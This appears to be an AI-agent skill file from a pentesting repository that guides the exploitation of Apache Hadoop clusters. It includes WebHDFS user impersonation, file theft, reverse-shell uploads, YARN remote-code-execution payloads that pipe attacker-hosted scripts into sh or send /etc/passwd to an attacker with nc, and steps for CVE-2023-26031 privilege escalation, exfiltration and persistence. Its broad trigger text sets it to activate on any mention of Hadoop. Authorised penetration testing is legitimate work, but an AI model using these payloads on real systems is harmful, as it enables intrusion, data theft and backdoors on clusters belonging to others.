Hacktricks-skills hadoop-pentest
How to enumerate and exploit Apache Hadoop clusters during penetration testing. Use this skill whenever you need to assess Hadoop security, test HDFS/WebHDFS access, exploit YARN RCE vulnerabilities, or check for CVE-2023-26031. Trigger on any mention of Hadoop, HDFS, YARN, MapReduce, distributed data processing security, or when you see ports 50030, 50060, 50070, 50075, 50090, 8088, 8042, 8031, 8032, 9870, 9864, or 14000 in a pentest engagement.
```shell
git clone https://github.com/abelrguezr/hacktricks-skills
```
`skills/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop/SKILL.md`

# Hadoop Pentesting Skill
This skill helps you enumerate and exploit Apache Hadoop clusters during penetration testing. Hadoop is an open-source framework for distributed storage and processing of large datasets across computer clusters.
## Quick Reference: Hadoop Ports
| Port | Service | Notes |
|---|---|---|
| 50030 | JobTracker | Legacy MapReduce |
| 50060 | TaskTracker | Legacy MapReduce |
| 50070 / 9870 | NameNode (WebHDFS) | Primary target for file operations |
| 50075 / 9864 | DataNode | Block storage |
| 50090 | Secondary NameNode | Metadata backup |
| 8088 | YARN ResourceManager | REST API & web UI - RCE target |
| 8042 | YARN NodeManager | Container management |
| 8031/8032 | YARN RPC | Often unauthenticated |
| 14000 | HttpFS | Alternative WebHDFS gateway |
## Step 1: Enumerate Hadoop Services
Start by identifying which Hadoop services are exposed. Use Nmap with the built-in Hadoop scripts:
```shell
# Full Hadoop enumeration
nmap -p 50030,50060,50070,50075,50090,8088,8042,8031,8032,9870,9864,14000 \
  --script hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-namenode-info,\
hadoop-datanode-info,hadoop-secondary-namenode-info \
  <target>

# Or use the bundled script
./scripts/enumerate-hadoop.sh <target>
```
Key insight: Hadoop operates without authentication in its default setup. This is your primary attack vector.
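When Nmap is unavailable, the same ports can be swept with plain bash. A minimal sketch, assuming bash's `/dev/tcp` pseudo-device and the coreutils `timeout` command are available (the two-second timeout is illustrative):

```shell
# Report a single TCP port as open or closed using bash's /dev/tcp;
# the timeout guards against filtered ports that never answer.
probe_port() {
  local host=$1 port=$2
  if timeout 2 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
    echo "$port open"
  else
    echo "$port closed"
  fi
}

# Sweep the common Hadoop ports from the table above.
sweep() {
  local host=$1 port
  for port in 50030 50060 50070 50075 50090 8088 8042 8031 8032 9870 9864 14000; do
    probe_port "$host" "$port"
  done
}
```

Usage: `sweep 10.0.0.5`.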
## Step 2: Exploit WebHDFS (Port 50070/9870/14000)

When `security=off` (the default), WebHDFS lets you impersonate any user via the `user.name` query parameter. This is the most common misconfiguration.
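Every request in this step shares the same URL shape, so a small helper keeps the host, port, and impersonated user consistent. A sketch; `hdfs` is the conventional superuser name, but the privileged account may differ per cluster:

```shell
# Build a WebHDFS URL for a host, port, HDFS path, operation, and
# impersonated user. user.name is trusted verbatim when security is off.
webhdfs_url() {
  local host=$1 port=$2 path=$3 op=$4 user=${5:-hdfs}
  echo "http://${host}:${port}/webhdfs/v1${path}?op=${op}&user.name=${user}"
}

# Example: list the HDFS root as the hdfs superuser
# curl "$(webhdfs_url 10.0.0.5 50070 / LISTSTATUS)"
```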
### List HDFS directories
```shell
# List root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# List specific path
curl "http://<host>:50070/webhdfs/v1/user/<username>/?op=LISTSTATUS&user.name=hdfs"
```
### Read arbitrary files from HDFS
```shell
# Read configuration files
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/hdfs-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/yarn-site.xml?op=OPEN&user.name=hdfs"

# Read user data
curl -L "http://<host>:50070/webhdfs/v1/user/<username>/data.csv?op=OPEN&user.name=hdfs"
```
### Upload payloads
```shell
# Upload a web shell or binary
curl -X PUT -T ./payload.sh \
  "http://<host>:50070/webhdfs/v1/tmp/payload.sh?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'

# Upload an executable
curl -X PUT -T ./reverse_shell \
  "http://<host>:50070/webhdfs/v1/tmp/reverse_shell?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'
```
Use the bundled script for common WebHDFS operations:
```shell
./scripts/webhdfs-abuse.sh <host> <port> <operation> <path>
```

Operations: `list`, `read`, `upload`, `download`
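The bundled script itself is not reproduced here, but the dispatch it needs is small: each friendly operation maps to a WebHDFS `op` value and an HTTP method. A hypothetical sketch, not the actual script contents:

```shell
# Map a friendly operation name to "HTTP-method WebHDFS-op".
# read and download both use OPEN; upload uses the two-step PUT CREATE.
webhdfs_op() {
  case $1 in
    list)          echo "GET LISTSTATUS" ;;
    read|download) echo "GET OPEN" ;;
    upload)        echo "PUT CREATE" ;;
    *)             echo "unknown operation: $1" >&2; return 1 ;;
  esac
}
```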
## Step 3: Exploit YARN Unauthenticated RCE (Port 8088)
The ResourceManager REST API accepts job submissions with no authentication in default "simple" mode. This allows arbitrary command execution without needing HDFS write access.
### Method 1: DistributedShell (Recommended)
```shell
# 1) Get an application ID
APP_ID=$(curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application | \
  jq -r '."application-id"')

# 2) Submit a job with your command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"'"$APP_ID"'",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://<attacker>/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'
```
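Hand-writing that JSON is error-prone because the command must be escaped into a JSON string. A sketch of a payload builder (the helper name is an assumption; the escaping handles only backslashes and double quotes, which covers typical shell one-liners):

```shell
# Build the minimal YARN application-submission JSON body for a given
# application id and shell command, escaping backslashes and quotes.
yarn_payload() {
  local app_id=$1 cmd=$2
  cmd=$(printf '%s' "$cmd" | sed 's/\\/\\\\/g; s/"/\\"/g')
  printf '{"application-id":"%s","application-name":"pwn","am-container-spec":{"commands":{"command":"%s"}},"application-type":"YARN"}' \
    "$app_id" "$cmd"
}

# Example: yarn_payload "$APP_ID" '/bin/bash -c "id"' | curl -s -X POST \
#   http://<host>:8088/ws/v1/cluster/apps -H 'Content-Type: application/json' -d @-
```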
### Method 2: Using the bundled script
```shell
./scripts/yarn-rce.sh <host> <command>

# Examples:
./scripts/yarn-rce.sh 10.0.0.5 "whoami"
./scripts/yarn-rce.sh 10.0.0.5 "curl http://attacker/reverse.sh|sh"
./scripts/yarn-rce.sh 10.0.0.5 "cat /etc/passwd | nc attacker 4444"
```
### Method 3: YARN RPC (Ports 8031/8032)
If these ports are exposed, older clusters allow job submission over protobuf without authentication. Treat these as RCE vectors as well.
## Step 4: Check for CVE-2023-26031 (Local PrivEsc)

In Hadoop 3.3.1–3.3.4, `container-executor` is built with a relative RUNPATH. If you can run YARN containers (including via remote submission on insecure clusters), you may be able to drop a malicious `libcrypto.so` into a writable path on that RUNPATH and gain root, since `container-executor` runs setuid root.
### Check for vulnerability
```shell
# Check RUNPATH configuration
readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
# Vulnerable if it contains $ORIGIN/:../lib/native/

# Check SUID bit
ls -l /opt/hadoop/bin/container-executor
# SUID+root makes it exploitable

# Check Hadoop version
hadoop version
# Vulnerable: 3.3.1, 3.3.2, 3.3.3, 3.3.4
# Fixed: 3.3.5+
```
### Use the bundled check script
```shell
./scripts/check-cve-2023-26031.sh
```
This script will:
- Check if container-executor exists
- Verify SUID bit is set
- Check RUNPATH for vulnerable configuration
- Report Hadoop version
- Provide exploitation guidance if vulnerable
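The RUNPATH part of that check reduces to a single string match against the vulnerable value noted above, `$ORIGIN/:../lib/native/`. A sketch of the decision logic in isolation:

```shell
# Return success if a RUNPATH/RPATH value contains the relative
# ../lib/native/ entry that makes CVE-2023-26031 exploitable.
runpath_vulnerable() {
  case $1 in
    *'$ORIGIN/:../lib/native/'*) return 0 ;;
    *)                           return 1 ;;
  esac
}

# In practice the value comes from the binary's dynamic section, e.g.:
# runpath=$(readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH')
# runpath_vulnerable "$runpath" && echo "likely vulnerable"
```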
## Step 5: Authenticate to Kerberos-Enabled Clusters

If Kerberos is enabled, anonymous access fails, but you can still authenticate with any valid ticket you hold:
```shell
# Use existing Kerberos ticket
curl --negotiate -u : "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"

# Or pass a specific ticket manually
curl -H "Authorization: Negotiate <ticket>" \
  "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"
```
## Common Attack Patterns
### Pattern 1: Full Cluster Compromise
- Enumerate with Nmap
- Read HDFS configuration files to understand cluster topology
- Upload a reverse shell to `/tmp/` via WebHDFS
- Submit a YARN job to execute the shell
- Check for CVE-2023-26031 for privilege escalation
- Pivot to other nodes using discovered credentials
### Pattern 2: Data Exfiltration
- Enumerate HDFS directories
- Identify sensitive data paths (user data, configs, credentials)
- Download files via WebHDFS `op=OPEN`
- For large files, use `op=OPEN` with the `offset` and `length` parameters
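WebHDFS `OPEN` accepts `offset` and `length` query parameters, so a large file can be pulled as a series of ranged requests. A sketch that emits the URL sequence for a file of known size (the base URL and sizes are illustrative; each URL would then be fetched with `curl -L ... >> outfile`):

```shell
# Emit the WebHDFS OPEN URLs needed to fetch a file of a given size
# (bytes) in fixed-size chunks, using offset/length query parameters.
chunk_urls() {
  local base=$1 size=$2 chunk=$3 offset=0
  while [ "$offset" -lt "$size" ]; do
    echo "${base}&offset=${offset}&length=${chunk}"
    offset=$((offset + chunk))
  done
}
```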
### Pattern 3: Persistence
- Upload malicious scripts to HDFS
- Create YARN jobs that run periodically
- Modify Hadoop configuration if write access allows
- Install backdoors in container-executor if CVE-2023-26031 is present
## Important Notes
- Default configuration is insecure: Hadoop ships with `security=off` by default
- No Metasploit support: use Nmap scripts and manual exploitation
- Kerberos is optional: Many deployments never enable it
- YARN RPC ports are often forgotten: Check 8031/8032 even if 8088 is filtered
- CVE-2023-26031 is critical: If you have YARN access, always check for this
## Scripts

This skill includes the following helper scripts in `scripts/`:

- `enumerate-hadoop.sh` - Nmap-based Hadoop service enumeration
- `webhdfs-abuse.sh` - WebHDFS operations (list, read, upload, download)
- `yarn-rce.sh` - YARN RCE exploitation via DistributedShell
- `check-cve-2023-26031.sh` - CVE-2023-26031 vulnerability check

Run `./scripts/<script-name>.sh --help` for usage details.